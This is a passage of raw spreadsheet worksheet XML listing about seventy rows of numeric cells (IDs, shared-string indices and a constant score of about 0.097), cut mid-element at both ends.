      </c>
      <c r="B32775" s="2">
        <v>4.6095558E7</v>
      </c>
      <c r="C32775" s="2" t="s">
        <v>31548</v>
      </c>
      <c r="D32775" s="2">
        <v>1.0</v>
      </c>
      <c r="E32775" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32775" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="32776" ht="15.75" customHeight="1">
      <c r="A32776" s="1">
        <v>16509.0</v>
      </c>
      <c r="B32776" s="2">
        <v>4.6611591E7</v>
      </c>
      <c r="C32776" s="2" t="s">
        <v>31549</v>
      </c>
      <c r="D32776" s="2">
        <v>1.0</v>
      </c>
      <c r="E32776" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32776" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="32777" ht="15.75" customHeight="1">
      <c r="A32777" s="1">
        <v>16552.0</v>
      </c>
      <c r="B32777" s="2">
        <v>4.6827135E7</v>
      </c>
      <c r="C32777" s="2" t="s">
        <v>31550</v>
      </c>
      <c r="D32777" s="2">
        <v>1.0</v>
      </c>
      <c r="E32777" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32777" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="32778" ht="15.75" customHeight="1">
      <c r="A32778" s="1">
        <v>16584.0</v>
      </c>
      <c r="B32778" s="2">
        <v>4.6923345E7</v>
      </c>
      <c r="C32778" s="2" t="s">
        <v>31551</v>
      </c>
      <c r="D32778" s="2">
        <v>1.0</v>
      </c>
      <c r="E32778" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32778" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="32779" ht="15.75" customHeight="1">
      <c r="A32779" s="1">
        <v>16590.0</v>
      </c>
      <c r="B32779" s="2">
        <v>4.6969947E7</v>
      </c>
      <c r="C32779" s="2" t="s">
        <v>31552</v>
      </c>
      <c r="D32779" s="2">
        <v>1.0</v>
      </c>
      <c r="E32779" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32779" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="32780" ht="15.75" customHeight="1">
      <c r="A32780" s="1">
        <v>16652.0</v>
      </c>
      <c r="B32780" s="2">
        <v>4719527.0</v>
      </c>
      <c r="C32780" s="2" t="s">
        <v>31553</v>
      </c>
      <c r="D32780" s="2">
        <v>1.0</v>
      </c>
      <c r="E32780" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32780" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="32781" ht="15.75" customHeight="1">
      <c r="A32781" s="1">
        <v>16656.0</v>
      </c>
      <c r="B32781" s="2">
        <v>4.7207711E7</v>
      </c>
      <c r="C32781" s="2" t="s">
        <v>31554</v>
      </c>
      <c r="D32781" s="2">
        <v>1.0</v>
      </c>
      <c r="E32781" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32781" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="32782" ht="15.75" customHeight="1">
      <c r="A32782" s="1">
        <v>16814.0</v>
      </c>
      <c r="B32782" s="2">
        <v>4.7818894E7</v>
      </c>
      <c r="C32782" s="2" t="s">
        <v>31555</v>
      </c>
      <c r="D32782" s="2">
        <v>1.0</v>
      </c>
      <c r="E32782" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32782" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="32783" ht="15.75" customHeight="1">
      <c r="A32783" s="1">
        <v>16868.0</v>
      </c>
      <c r="B32783" s="2">
        <v>4.7956305E7</v>
      </c>
      <c r="C32783" s="2" t="s">
        <v>31556</v>
      </c>
      <c r="D32783" s="2">
        <v>1.0</v>
      </c>
      <c r="E32783" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32783" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="32784" ht="15.75" customHeight="1">
      <c r="A32784" s="1">
        <v>16932.0</v>
      </c>
      <c r="B32784" s="2">
        <v>4.8169858E7</v>
      </c>
      <c r="C32784" s="2" t="s">
        <v>31557</v>
      </c>
      <c r="D32784" s="2">
        <v>1.0</v>
      </c>
      <c r="E32784" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32784" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="32785" ht="15.75" customHeight="1">
      <c r="A32785" s="1">
        <v>17037.0</v>
      </c>
      <c r="B32785" s="2">
        <v>4.8505919E7</v>
      </c>
      <c r="C32785" s="2" t="s">
        <v>31558</v>
      </c>
      <c r="D32785" s="2">
        <v>1.0</v>
      </c>
      <c r="E32785" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32785" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="32786" ht="15.75" customHeight="1">
      <c r="A32786" s="1">
        <v>17199.0</v>
      </c>
      <c r="B32786" s="2">
        <v>4.9002784E7</v>
      </c>
      <c r="C32786" s="2" t="s">
        <v>31559</v>
      </c>
      <c r="D32786" s="2">
        <v>1.0</v>
      </c>
      <c r="E32786" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32786" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="32787" ht="15.75" customHeight="1">
      <c r="A32787" s="1">
        <v>17338.0</v>
      </c>
      <c r="B32787" s="2">
        <v>4.9394134E7</v>
      </c>
      <c r="C32787" s="2" t="s">
        <v>31560</v>
      </c>
      <c r="D32787" s="2">
        <v>1.0</v>
      </c>
      <c r="E32787" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32787" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="32788" ht="15.75" customHeight="1">
      <c r="A32788" s="1">
        <v>17392.0</v>
      </c>
      <c r="B32788" s="2">
        <v>4.9621056E7</v>
      </c>
      <c r="C32788" s="2" t="s">
        <v>31561</v>
      </c>
      <c r="D32788" s="2">
        <v>1.0</v>
      </c>
      <c r="E32788" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32788" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="32789" ht="15.75" customHeight="1">
      <c r="A32789" s="1">
        <v>17604.0</v>
      </c>
      <c r="B32789" s="2">
        <v>5.0354654E7</v>
      </c>
      <c r="C32789" s="2" t="s">
        <v>31562</v>
      </c>
      <c r="D32789" s="2">
        <v>1.0</v>
      </c>
      <c r="E32789" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32789" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="32790" ht="15.75" customHeight="1">
      <c r="A32790" s="1">
        <v>17645.0</v>
      </c>
      <c r="B32790" s="2">
        <v>5.0409562E7</v>
      </c>
      <c r="C32790" s="2" t="s">
        <v>31563</v>
      </c>
      <c r="D32790" s="2">
        <v>1.0</v>
      </c>
      <c r="E32790" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32790" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="32791" ht="15.75" customHeight="1">
      <c r="A32791" s="1">
        <v>17729.0</v>
      </c>
      <c r="B32791" s="2">
        <v>5.0669493E7</v>
      </c>
      <c r="C32791" s="2" t="s">
        <v>31564</v>
      </c>
      <c r="D32791" s="2">
        <v>1.0</v>
      </c>
      <c r="E32791" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32791" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="32792" ht="15.75" customHeight="1">
      <c r="A32792" s="1">
        <v>17755.0</v>
      </c>
      <c r="B32792" s="2">
        <v>5.071022E7</v>
      </c>
      <c r="C32792" s="2" t="s">
        <v>31565</v>
      </c>
      <c r="D32792" s="2">
        <v>1.0</v>
      </c>
      <c r="E32792" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32792" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="32793" ht="15.75" customHeight="1">
      <c r="A32793" s="1">
        <v>18022.0</v>
      </c>
      <c r="B32793" s="2">
        <v>5.1519213E7</v>
      </c>
      <c r="C32793" s="2" t="s">
        <v>31566</v>
      </c>
      <c r="D32793" s="2">
        <v>1.0</v>
      </c>
      <c r="E32793" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32793" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="32794" ht="15.75" customHeight="1">
      <c r="A32794" s="1">
        <v>18237.0</v>
      </c>
      <c r="B32794" s="2">
        <v>5.2132233E7</v>
      </c>
      <c r="C32794" s="2" t="s">
        <v>31567</v>
      </c>
      <c r="D32794" s="2">
        <v>1.0</v>
      </c>
      <c r="E32794" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32794" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="32795" ht="15.75" customHeight="1">
      <c r="A32795" s="1">
        <v>18245.0</v>
      </c>
      <c r="B32795" s="2">
        <v>5.2144673E7</v>
      </c>
      <c r="C32795" s="2" t="s">
        <v>31568</v>
      </c>
      <c r="D32795" s="2">
        <v>1.0</v>
      </c>
      <c r="E32795" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32795" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="32796" ht="15.75" customHeight="1">
      <c r="A32796" s="1">
        <v>18344.0</v>
      </c>
      <c r="B32796" s="2">
        <v>5.245882E7</v>
      </c>
      <c r="C32796" s="2" t="s">
        <v>31569</v>
      </c>
      <c r="D32796" s="2">
        <v>1.0</v>
      </c>
      <c r="E32796" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32796" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="32797" ht="15.75" customHeight="1">
      <c r="A32797" s="1">
        <v>18420.0</v>
      </c>
      <c r="B32797" s="2">
        <v>5.269047E7</v>
      </c>
      <c r="C32797" s="2" t="s">
        <v>31570</v>
      </c>
      <c r="D32797" s="2">
        <v>1.0</v>
      </c>
      <c r="E32797" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32797" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="32798" ht="15.75" customHeight="1">
      <c r="A32798" s="1">
        <v>18435.0</v>
      </c>
      <c r="B32798" s="2">
        <v>5.2744938E7</v>
      </c>
      <c r="C32798" s="2" t="s">
        <v>31571</v>
      </c>
      <c r="D32798" s="2">
        <v>1.0</v>
      </c>
      <c r="E32798" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32798" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="32799" ht="15.75" customHeight="1">
      <c r="A32799" s="1">
        <v>18456.0</v>
      </c>
      <c r="B32799" s="2">
        <v>5.2825263E7</v>
      </c>
      <c r="C32799" s="2" t="s">
        <v>31572</v>
      </c>
      <c r="D32799" s="2">
        <v>1.0</v>
      </c>
      <c r="E32799" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32799" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="32800" ht="15.75" customHeight="1">
      <c r="A32800" s="1">
        <v>18539.0</v>
      </c>
      <c r="B32800" s="2">
        <v>5.3114571E7</v>
      </c>
      <c r="C32800" s="2" t="s">
        <v>31573</v>
      </c>
      <c r="D32800" s="2">
        <v>1.0</v>
      </c>
      <c r="E32800" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32800" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="32801" ht="15.75" customHeight="1">
      <c r="A32801" s="1">
        <v>18988.0</v>
      </c>
      <c r="B32801" s="2">
        <v>5.441386E7</v>
      </c>
      <c r="C32801" s="2" t="s">
        <v>31574</v>
      </c>
      <c r="D32801" s="2">
        <v>1.0</v>
      </c>
      <c r="E32801" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32801" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="32802" ht="15.75" customHeight="1">
      <c r="A32802" s="1">
        <v>19177.0</v>
      </c>
      <c r="B32802" s="2">
        <v>5.4972328E7</v>
      </c>
      <c r="C32802" s="2" t="s">
        <v>31575</v>
      </c>
      <c r="D32802" s="2">
        <v>1.0</v>
      </c>
      <c r="E32802" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32802" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="32803" ht="15.75" customHeight="1">
      <c r="A32803" s="1">
        <v>19266.0</v>
      </c>
      <c r="B32803" s="2">
        <v>5.513767E7</v>
      </c>
      <c r="C32803" s="2" t="s">
        <v>31576</v>
      </c>
      <c r="D32803" s="2">
        <v>1.0</v>
      </c>
      <c r="E32803" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32803" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="32804" ht="15.75" customHeight="1">
      <c r="A32804" s="1">
        <v>19271.0</v>
      </c>
      <c r="B32804" s="2">
        <v>5.5154153E7</v>
      </c>
      <c r="C32804" s="2" t="s">
        <v>31577</v>
      </c>
      <c r="D32804" s="2">
        <v>1.0</v>
      </c>
      <c r="E32804" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32804" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="32805" ht="15.75" customHeight="1">
      <c r="A32805" s="1">
        <v>19273.0</v>
      </c>
      <c r="B32805" s="2">
        <v>5.5161464E7</v>
      </c>
      <c r="C32805" s="2" t="s">
        <v>31578</v>
      </c>
      <c r="D32805" s="2">
        <v>1.0</v>
      </c>
      <c r="E32805" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32805" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="32806" ht="15.75" customHeight="1">
      <c r="A32806" s="1">
        <v>19360.0</v>
      </c>
      <c r="B32806" s="2">
        <v>5.545735E7</v>
      </c>
      <c r="C32806" s="2" t="s">
        <v>31579</v>
      </c>
      <c r="D32806" s="2">
        <v>1.0</v>
      </c>
      <c r="E32806" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32806" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="32807" ht="15.75" customHeight="1">
      <c r="A32807" s="1">
        <v>19479.0</v>
      </c>
      <c r="B32807" s="2">
        <v>5.5854104E7</v>
      </c>
      <c r="C32807" s="2" t="s">
        <v>31580</v>
      </c>
      <c r="D32807" s="2">
        <v>1.0</v>
      </c>
      <c r="E32807" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32807" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="32808" ht="15.75" customHeight="1">
      <c r="A32808" s="1">
        <v>19695.0</v>
      </c>
      <c r="B32808" s="2">
        <v>5.6476008E7</v>
      </c>
      <c r="C32808" s="2" t="s">
        <v>31581</v>
      </c>
      <c r="D32808" s="2">
        <v>1.0</v>
      </c>
      <c r="E32808" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32808" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="32809" ht="15.75" customHeight="1">
      <c r="A32809" s="1">
        <v>19714.0</v>
      </c>
      <c r="B32809" s="2">
        <v>5.6558881E7</v>
      </c>
      <c r="C32809" s="2" t="s">
        <v>31582</v>
      </c>
      <c r="D32809" s="2">
        <v>1.0</v>
      </c>
      <c r="E32809" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32809" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="32810" ht="15.75" customHeight="1">
      <c r="A32810" s="1">
        <v>19805.0</v>
      </c>
      <c r="B32810" s="2">
        <v>5.6882986E7</v>
      </c>
      <c r="C32810" s="2" t="s">
        <v>31583</v>
      </c>
      <c r="D32810" s="2">
        <v>1.0</v>
      </c>
      <c r="E32810" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32810" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="32811" ht="15.75" customHeight="1">
      <c r="A32811" s="1">
        <v>19948.0</v>
      </c>
      <c r="B32811" s="2">
        <v>5.7495651E7</v>
      </c>
      <c r="C32811" s="2" t="s">
        <v>31584</v>
      </c>
      <c r="D32811" s="2">
        <v>1.0</v>
      </c>
      <c r="E32811" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32811" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="32812" ht="15.75" customHeight="1">
      <c r="A32812" s="1">
        <v>19955.0</v>
      </c>
      <c r="B32812" s="2">
        <v>5.7527803E7</v>
      </c>
      <c r="C32812" s="2" t="s">
        <v>31585</v>
      </c>
      <c r="D32812" s="2">
        <v>1.0</v>
      </c>
      <c r="E32812" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32812" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="32813" ht="15.75" customHeight="1">
      <c r="A32813" s="1">
        <v>20013.0</v>
      </c>
      <c r="B32813" s="2">
        <v>5.7740849E7</v>
      </c>
      <c r="C32813" s="2" t="s">
        <v>31586</v>
      </c>
      <c r="D32813" s="2">
        <v>1.0</v>
      </c>
      <c r="E32813" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32813" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="32814" ht="15.75" customHeight="1">
      <c r="A32814" s="1">
        <v>20325.0</v>
      </c>
      <c r="B32814" s="2">
        <v>1.1484224E7</v>
      </c>
      <c r="C32814" s="2" t="s">
        <v>31587</v>
      </c>
      <c r="D32814" s="2">
        <v>1.0</v>
      </c>
      <c r="E32814" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32814" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="32815" ht="15.75" customHeight="1">
      <c r="A32815" s="1">
        <v>20589.0</v>
      </c>
      <c r="B32815" s="2">
        <v>1.3777161E7</v>
      </c>
      <c r="C32815" s="2" t="s">
        <v>31588</v>
      </c>
      <c r="D32815" s="2">
        <v>1.0</v>
      </c>
      <c r="E32815" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32815" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="32816" ht="15.75" customHeight="1">
      <c r="A32816" s="1">
        <v>20669.0</v>
      </c>
      <c r="B32816" s="2">
        <v>1.4386025E7</v>
      </c>
      <c r="C32816" s="2" t="s">
        <v>31589</v>
      </c>
      <c r="D32816" s="2">
        <v>1.0</v>
      </c>
      <c r="E32816" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32816" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="32817" ht="15.75" customHeight="1">
      <c r="A32817" s="1">
        <v>20674.0</v>
      </c>
      <c r="B32817" s="2">
        <v>1.439656E7</v>
      </c>
      <c r="C32817" s="2" t="s">
        <v>31590</v>
      </c>
      <c r="D32817" s="2">
        <v>1.0</v>
      </c>
      <c r="E32817" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32817" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="32818" ht="15.75" customHeight="1">
      <c r="A32818" s="1">
        <v>21040.0</v>
      </c>
      <c r="B32818" s="2">
        <v>1.7623992E7</v>
      </c>
      <c r="C32818" s="2" t="s">
        <v>31591</v>
      </c>
      <c r="D32818" s="2">
        <v>1.0</v>
      </c>
      <c r="E32818" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32818" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="32819" ht="15.75" customHeight="1">
      <c r="A32819" s="1">
        <v>21111.0</v>
      </c>
      <c r="B32819" s="2">
        <v>1.8232684E7</v>
      </c>
      <c r="C32819" s="2" t="s">
        <v>31592</v>
      </c>
      <c r="D32819" s="2">
        <v>1.0</v>
      </c>
      <c r="E32819" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32819" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="32820" ht="15.75" customHeight="1">
      <c r="A32820" s="1">
        <v>21167.0</v>
      </c>
      <c r="B32820" s="2">
        <v>1.9013434E7</v>
      </c>
      <c r="C32820" s="2" t="s">
        <v>31593</v>
      </c>
      <c r="D32820" s="2">
        <v>1.0</v>
      </c>
      <c r="E32820" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32820" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="32821" ht="15.75" customHeight="1">
      <c r="A32821" s="1">
        <v>21403.0</v>
      </c>
      <c r="B32821" s="2">
        <v>2.1920158E7</v>
      </c>
      <c r="C32821" s="2" t="s">
        <v>31594</v>
      </c>
      <c r="D32821" s="2">
        <v>1.0</v>
      </c>
      <c r="E32821" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32821" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="32822" ht="15.75" customHeight="1">
      <c r="A32822" s="1">
        <v>21715.0</v>
      </c>
      <c r="B32822" s="2">
        <v>2.548306E7</v>
      </c>
      <c r="C32822" s="2" t="s">
        <v>31595</v>
      </c>
      <c r="D32822" s="2">
        <v>1.0</v>
      </c>
      <c r="E32822" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32822" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="32823" ht="15.75" customHeight="1">
      <c r="A32823" s="1">
        <v>22019.0</v>
      </c>
      <c r="B32823" s="2">
        <v>2.9978087E7</v>
      </c>
      <c r="C32823" s="2" t="s">
        <v>31596</v>
      </c>
      <c r="D32823" s="2">
        <v>1.0</v>
      </c>
      <c r="E32823" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32823" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="32824" ht="15.75" customHeight="1">
      <c r="A32824" s="1">
        <v>22375.0</v>
      </c>
      <c r="B32824" s="2">
        <v>3.5053146E7</v>
      </c>
      <c r="C32824" s="2" t="s">
        <v>31597</v>
      </c>
      <c r="D32824" s="2">
        <v>1.0</v>
      </c>
      <c r="E32824" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32824" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="32825" ht="15.75" customHeight="1">
      <c r="A32825" s="1">
        <v>22460.0</v>
      </c>
      <c r="B32825" s="2">
        <v>3.6512558E7</v>
      </c>
      <c r="C32825" s="2" t="s">
        <v>31598</v>
      </c>
      <c r="D32825" s="2">
        <v>1.0</v>
      </c>
      <c r="E32825" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32825" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="32826" ht="15.75" customHeight="1">
      <c r="A32826" s="1">
        <v>22662.0</v>
      </c>
      <c r="B32826" s="2">
        <v>4.1336107E7</v>
      </c>
      <c r="C32826" s="2" t="s">
        <v>31599</v>
      </c>
      <c r="D32826" s="2">
        <v>1.0</v>
      </c>
      <c r="E32826" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32826" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="32827" ht="15.75" customHeight="1">
      <c r="A32827" s="1">
        <v>22764.0</v>
      </c>
      <c r="B32827" s="2">
        <v>4.4803324E7</v>
      </c>
      <c r="C32827" s="2" t="s">
        <v>31600</v>
      </c>
      <c r="D32827" s="2">
        <v>1.0</v>
      </c>
      <c r="E32827" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32827" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="32828" ht="15.75" customHeight="1">
      <c r="A32828" s="1">
        <v>22785.0</v>
      </c>
      <c r="B32828" s="2">
        <v>4531076.0</v>
      </c>
      <c r="C32828" s="2" t="s">
        <v>31601</v>
      </c>
      <c r="D32828" s="2">
        <v>1.0</v>
      </c>
      <c r="E32828" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32828" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="32829" ht="15.75" customHeight="1">
      <c r="A32829" s="1">
        <v>23486.0</v>
      </c>
      <c r="B32829" s="2">
        <v>5.7366434E7</v>
      </c>
      <c r="C32829" s="2" t="s">
        <v>31602</v>
      </c>
      <c r="D32829" s="2">
        <v>1.0</v>
      </c>
      <c r="E32829" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32829" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="32830" ht="15.75" customHeight="1">
      <c r="A32830" s="1">
        <v>23705.0</v>
      </c>
      <c r="B32830" s="2">
        <v>7125507.0</v>
      </c>
      <c r="C32830" s="2" t="s">
        <v>31603</v>
      </c>
      <c r="D32830" s="2">
        <v>1.0</v>
      </c>
      <c r="E32830" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32830" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="32831" ht="15.75" customHeight="1">
      <c r="A32831" s="1">
        <v>23841.0</v>
      </c>
      <c r="B32831" s="2">
        <v>8140525.0</v>
      </c>
      <c r="C32831" s="2" t="s">
        <v>31604</v>
      </c>
      <c r="D32831" s="2">
        <v>1.0</v>
      </c>
      <c r="E32831" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32831" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="32832" ht="15.75" customHeight="1">
      <c r="A32832" s="1">
        <v>24037.0</v>
      </c>
      <c r="B32832" s="2">
        <v>9465089.0</v>
      </c>
      <c r="C32832" s="2" t="s">
        <v>31605</v>
      </c>
      <c r="D32832" s="2">
        <v>1.0</v>
      </c>
      <c r="E32832" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32832" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="32833" ht="15.75" customHeight="1">
      <c r="A32833" s="1">
        <v>24185.0</v>
      </c>
      <c r="B32833" s="2">
        <v>1.0266525E7</v>
      </c>
      <c r="C32833" s="2" t="s">
        <v>4778</v>
      </c>
      <c r="D32833" s="2">
        <v>1.0</v>
      </c>
      <c r="E32833" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32833" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="32834" ht="15.75" customHeight="1">
      <c r="A32834" s="1">
        <v>24192.0</v>
      </c>
      <c r="B32834" s="2">
        <v>1.0285305E7</v>
      </c>
      <c r="C32834" s="2" t="s">
        <v>31606</v>
      </c>
      <c r="D32834" s="2">
        <v>1.0</v>
      </c>
      <c r="E32834" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32834" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="32835" ht="15.75" customHeight="1">
      <c r="A32835" s="1">
        <v>24246.0</v>
      </c>
      <c r="B32835" s="2">
        <v>1.0500615E7</v>
      </c>
      <c r="C32835" s="2" t="s">
        <v>31607</v>
      </c>
      <c r="D32835" s="2">
        <v>1.0</v>
      </c>
      <c r="E32835" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32835" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="32836" ht="15.75" customHeight="1">
      <c r="A32836" s="1">
        <v>24298.0</v>
      </c>
      <c r="B32836" s="2">
        <v>1.0561467E7</v>
      </c>
      <c r="C32836" s="2" t="s">
        <v>31608</v>
      </c>
      <c r="D32836" s="2">
        <v>1.0</v>
      </c>
      <c r="E32836" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32836" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="32837" ht="15.75" customHeight="1">
      <c r="A32837" s="1">
        <v>24322.0</v>
      </c>
      <c r="B32837" s="2">
        <v>1.0635992E7</v>
      </c>
      <c r="C32837" s="2" t="s">
        <v>31609</v>
      </c>
      <c r="D32837" s="2">
        <v>1.0</v>
      </c>
      <c r="E32837" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32837" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="32838" ht="15.75" customHeight="1">
      <c r="A32838" s="1">
        <v>24349.0</v>
      </c>
      <c r="B32838" s="2">
        <v>1.0717699E7</v>
      </c>
      <c r="C32838" s="2" t="s">
        <v>31610</v>
      </c>
      <c r="D32838" s="2">
        <v>1.0</v>
      </c>
      <c r="E32838" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32838" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="32839" ht="15.75" customHeight="1">
      <c r="A32839" s="1">
        <v>24410.0</v>
      </c>
      <c r="B32839" s="2">
        <v>1.0824356E7</v>
      </c>
      <c r="C32839" s="2" t="s">
        <v>31611</v>
      </c>
      <c r="D32839" s="2">
        <v>1.0</v>
      </c>
      <c r="E32839" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32839" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="32840" ht="15.75" customHeight="1">
      <c r="A32840" s="1">
        <v>24968.0</v>
      </c>
      <c r="B32840" s="2">
        <v>1.260535E7</v>
      </c>
      <c r="C32840" s="2" t="s">
        <v>31612</v>
      </c>
      <c r="D32840" s="2">
        <v>1.0</v>
      </c>
      <c r="E32840" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32840" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="32841" ht="15.75" customHeight="1">
      <c r="A32841" s="1">
        <v>25111.0</v>
      </c>
      <c r="B32841" s="2">
        <v>1.2965435E7</v>
      </c>
      <c r="C32841" s="2" t="s">
        <v>31613</v>
      </c>
      <c r="D32841" s="2">
        <v>1.0</v>
      </c>
      <c r="E32841" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32841" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="32842" ht="15.75" customHeight="1">
      <c r="A32842" s="1">
        <v>25205.0</v>
      </c>
